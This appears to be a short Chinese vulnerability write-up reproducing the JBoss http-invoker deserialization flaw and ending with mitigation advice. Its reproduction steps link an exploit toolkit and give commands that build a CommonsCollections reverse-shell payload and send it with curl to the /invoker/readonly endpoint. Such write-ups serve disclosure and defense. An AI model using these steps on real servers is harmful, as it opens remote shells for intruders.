复现环境
影响范围
复现过程
扫描二维码关注公众号,回复:
8563330 查看本文章
访问下http://192.168.61.1:8080/invoker/readonly
下载利用工具:http://scan.javasec.cn/java/JavaDeserH2HC.zip
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port //反弹shell的IP和端口
curl http://192.168.61.1:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
防御方法
建议用户升级到JBOSS AS7。另,不能及时升级的用户,可采取如下临时解决方案:
1. 不需要 http-invoker.sar 组件的用户可直接删除此组件。
2. 添加如下代码至 http-invoker.sar 下 web.xml 的 security-constraint 标签中:<url-pattern>/*</url-pattern> 用于对 http invoker 组件进行访问控制。